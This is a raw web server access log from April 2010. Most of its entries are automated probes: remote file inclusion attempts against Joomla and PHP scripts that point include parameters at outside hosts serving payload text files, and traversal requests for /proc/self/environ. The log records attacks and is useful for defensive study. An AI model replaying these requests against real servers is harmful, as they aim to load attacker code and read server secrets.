77.93.196.11 - - [20/Apr/2010:22:57:56 -0500] "GET /phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
77.93.196.11 - - [20/Apr/2010:22:57:56 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
77.93.196.11 - - [20/Apr/2010:22:57:56 -0500] "GET /logs/phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:22:58:05 -0500] "GET /logs/access_log.1193702400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.34.175.15 - - [20/Apr/2010:22:58:24 -0500] "GET /phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:22:58:24 -0500] "GET /logs/phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:22:58:24 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
77.93.196.11 - - [20/Apr/2010:22:58:37 -0500] "GET /logs/access_log.1220054400%20%20/phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:22:59:10 -0500] "GET /logs/access_log.1220054400%20%20/phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.46.42.233 - - [20/Apr/2010:22:59:45 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fuerzarh.com//appserv/.logs?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
78.46.42.233 - - [20/Apr/2010:22:59:45 -0500] "GET /logs/access_log.1219363200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fuerzarh.com//appserv/.logs?? HTTP/1.1" 404 355 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
78.46.42.233 - - [20/Apr/2010:22:59:45 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fuerzarh.com//appserv/.logs?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
87.250.255.243 - - [20/Apr/2010:23:00:38 -0500] "GET /logs/access_log.1198368000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.93.196.11 - - [20/Apr/2010:23:03:21 -0500] "GET /logs/access_log.1219708800/phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.93.196.11 - - [20/Apr/2010:23:03:25 -0500] "GET /logs/access_log.1220054400/phphtml.php?htmlclass_path=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:04:27 -0500] "GET /logs/access_log.1189209600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.30.161.241 - - [20/Apr/2010:23:05:20 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:23:06:21 -0500] "GET /logs/access_log.1260576000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
164.77.228.200 - - [20/Apr/2010:23:07:13 -0500] "GET /logs/access_log.1271030400%20%20//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 392 "-""Mozilla/5.0"
164.77.228.200 - - [20/Apr/2010:23:07:13 -0500] "GET //zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
164.77.228.200 - - [20/Apr/2010:23:07:13 -0500] "GET /logs//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:07:38 -0500] "GET /logs/access_log.1232928000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.198.171.53 - - [20/Apr/2010:23:07:49 -0500] "GET /logs/access_log.1271030400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:23:07:49 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:23:07:49 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
164.77.228.200 - - [20/Apr/2010:23:09:42 -0500] "GET //zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
164.77.228.200 - - [20/Apr/2010:23:09:43 -0500] "GET /logs/access_log.1271030400//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 390 "-""Mozilla/5.0"
164.77.228.200 - - [20/Apr/2010:23:09:43 -0500] "GET /logs//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:10:38 -0500] "GET //xbox/download//xbox/maxcomment//maxcomment/reply-7.html//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:10:38 -0500] "GET /logs/access_log.1266278400//xbox/download//xbox/maxcomment//maxcomment/reply-7.html//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:10:38 -0500] "GET /logs/access_log.1265760000//xbox/download//xbox/maxcomment//maxcomment/reply-7.html//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:10:38 -0500] "GET /logs//xbox/download//xbox/maxcomment//maxcomment/reply-7.html//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:10:48 -0500] "GET /logs/access_log.1169424000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:23:10:48 -0500] "GET /logs/access_log.1271030400//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:10:48 -0500] "GET /logs//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:10:48 -0500] "GET //galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:11:05 -0500] "GET /logs//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:11:05 -0500] "GET /logs/access_log.1271030400//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:11:05 -0500] "GET //galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:11:05 -0500] "GET /logs/access_log.1271030400//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:11:05 -0500] "GET /logs//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:11:05 -0500] "GET //galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:11:10 -0500] "GET //galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:11:10 -0500] "GET /logs//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:11:10 -0500] "GET /logs/access_log.1271030400//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
206.53.52.78 - - [20/Apr/2010:23:11:16 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
164.77.228.200 - - [20/Apr/2010:23:11:25 -0500] "GET //zcaccomponents/com_artlinks/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
164.77.228.200 - - [20/Apr/2010:23:11:25 -0500] "GET /logs//zcaccomponents/com_artlinks/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
164.77.228.200 - - [20/Apr/2010:23:11:31 -0500] "GET /logs/access_log.1206316800%20%20//zcaccomponents/com_artlinks/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 392 "-""Mozilla/5.0"
91.121.149.159 - - [20/Apr/2010:23:11:53 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.250.255.243 - - [20/Apr/2010:23:13:21 -0500] "GET /logs/access_log.1180742400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.149.159 - - [20/Apr/2010:23:13:48 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.149.159 - - [20/Apr/2010:23:13:48 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.222.152.66 - - [20/Apr/2010:23:14:59 -0500] "GET /logs/access_log.1271030400%20%20//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:15:00 -0500] "GET /logs/access_log.1264896000//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:15:06 -0500] "GET /logs/access_log.1271030400%20%20//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:15:16 -0500] "GET /logs/access_log.1271030400%20%20//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:15:34 -0500] "GET /logs/access_log.1245283200//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:15:53 -0500] "GET /logs/access_log.1168041600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.43 - - [20/Apr/2010:23:15:57 -0500] "GET /logs/access_log.1163894400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.53.52.78 - - [20/Apr/2010:23:16:26 -0500] "GET /logs/access_log.1271030400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
206.53.52.78 - - [20/Apr/2010:23:16:26 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
206.53.52.78 - - [20/Apr/2010:23:16:27 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
164.77.228.200 - - [20/Apr/2010:23:16:28 -0500] "GET //zcaccomponents/com_artlinks/assets/captcha/includes/captchalinks/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
164.77.228.200 - - [20/Apr/2010:23:16:28 -0500] "GET /logs//zcaccomponents/com_artlinks/assets/captcha/includes/captchalinks/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
164.77.228.200 - - [20/Apr/2010:23:16:28 -0500] "GET /logs/access_log.1206316800%20%20//zcaccomponents/com_artlinks/assets/captcha/includes/captchalinks/imgcaptcha.php?mosConfig_absolute_path=http://xoven.110mb.com/z1.txt? HTTP/1.1" 404 393 "-""Mozilla/5.0"
92.24.56.122 - - [20/Apr/2010:23:16:37 -0500] "GET /logs/access_log.1214006400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)"
67.222.152.66 - - [20/Apr/2010:23:16:38 -0500] "GET /logs/access_log.1271030400%20%20//galeria.php?start=0&kategoria=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
206.53.52.78 - - [20/Apr/2010:23:17:30 -0500] "GET /logs/access_log.1271030400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
206.53.52.78 - - [20/Apr/2010:23:17:30 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
206.53.52.78 - - [20/Apr/2010:23:17:30 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
87.250.255.243 - - [20/Apr/2010:23:17:48 -0500] "GET /logs/access_log.1265760000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.149.159 - - [20/Apr/2010:23:18:59 -0500] "GET /logs/access_log.1271030400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.149.159 - - [20/Apr/2010:23:19:00 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.149.159 - - [20/Apr/2010:23:19:00 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
125.251.103.3 - - [20/Apr/2010:23:19:29 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:19:29 -0500] "GET /logs/access_log.1245283200//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:19:29 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:19:53 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:19:53 -0500] "GET /logs/access_log.1245283200//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:19:53 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:20:20 -0500] "GET /logs/access_log.1174521600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.251.103.3 - - [20/Apr/2010:23:22:04 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:22:04 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:22:04 -0500] "GET /logs/access_log.1265760000//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:23:22:12 -0500] "GET /logs/access_log.1266278400//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:22:55 -0500] "GET /logs/access_log.1257465600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:23:24:11 -0500] "GET /logs/access_log.1240704000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.40.30.37 - - [20/Apr/2010:23:24:41 -0500] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [20/Apr/2010:23:24:41 -0500] "GET //cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [20/Apr/2010:23:24:41 -0500] "GET /logs/access_log.1270684800//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:27:22 -0500] "GET /logs/access_log.1173312000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:23:29:54 -0500] "GET /logs/access_log.1168300800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:23:31:48 -0500] "GET /logs/access_log.1212451200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.179 - - [20/Apr/2010:23:31:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:23:34:21 -0500] "GET /logs/access_log.1196640000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:23:36:53 -0500] "GET /logs/access_log.1251849600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:23:38:48 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.171.74 - - [20/Apr/2010:23:41:34 -0500] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:23:41:34 -0500] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:23:41:34 -0500] "GET /logs/access_log.1267920000//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:41:50 -0500] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:41:50 -0500] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:41:50 -0500] "GET /logs/access_log.1267920000//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:23:41:58 -0500] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:23:41:58 -0500] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:23:41:58 -0500] "GET /logs/access_log.1267920000//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:41:58 -0500] "GET /logs/access_log.1208390400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:23:42:27 -0500] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:42:27 -0500] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:23:42:27 -0500] "GET /logs/access_log.1267920000//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
201.38.203.3 - - [20/Apr/2010:23:44:02 -0500] "GET /logs/access_log.1229644800//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.250.255.243 - - [20/Apr/2010:23:45:48 -0500] "GET /logs/access_log.1192406400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.237 - - [20/Apr/2010:23:47:56 -0500] "GET /logs/access_log.1213401600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:23:48:59 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:23:50:53 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:23:53:26 -0500] "GET /logs/access_log.1195948800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
59.21.247.137 - - [20/Apr/2010:23:53:28 -0500] "GET /view.php?dir=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
59.21.247.137 - - [20/Apr/2010:23:53:28 -0500] "GET /logs/access_log.1266451200/view.php?dir=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
59.21.247.137 - - [20/Apr/2010:23:53:28 -0500] "GET /logs/view.php?dir=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:23:55:58 -0500] "GET /logs/access_log.1240185600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
201.38.203.3 - - [20/Apr/2010:23:56:04 -0500] "GET /logs/access_log.1229731200//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
217.70.32.2 - - [20/Apr/2010:23:56:15 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.70.32.2 - - [20/Apr/2010:23:56:15 -0500] "GET /logs//zipndownload.php?PP_PATH=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.70.32.2 - - [20/Apr/2010:23:56:15 -0500] "GET //zipndownload.php?PP_PATH=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.70.32.2 - - [20/Apr/2010:23:56:19 -0500] "GET //zipndownload.php?PP_PATH=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.70.32.2 - - [20/Apr/2010:23:56:19 -0500] "GET /logs//zipndownload.php?PP_PATH=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.70.32.2 - - [20/Apr/2010:23:56:19 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.70.32.2 - - [20/Apr/2010:23:56:28 -0500] "GET /logs/access_log.1251504000//zipndownload.php?PP_PATH=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:23:57:14 -0500] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:23:57:14 -0500] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:23:57:14 -0500] "GET /logs/access_log.1265760000//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
